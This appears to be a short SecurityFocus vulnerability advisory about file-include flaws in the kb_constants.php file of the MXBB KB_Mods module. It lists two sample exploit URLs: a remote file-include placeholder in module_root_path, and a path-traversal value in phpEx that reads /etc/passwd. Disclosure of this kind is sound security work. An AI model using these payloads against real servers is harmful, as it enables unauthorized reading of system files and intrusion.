MXBB KB_Mods Module KB_Constants.PHP Multiple File Include Vulnerabilities

An attacker can exploit these issues via a web client.

The following sample exploits are available:

http://www.example.com/[path]/includes/kb_constants.php?module_root_path=Evil Code
http://www.example.com/[path]/includes/kb_constants.php?kb_constants.php&board_config[default_lang]=english&phpEx=../../../../../etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus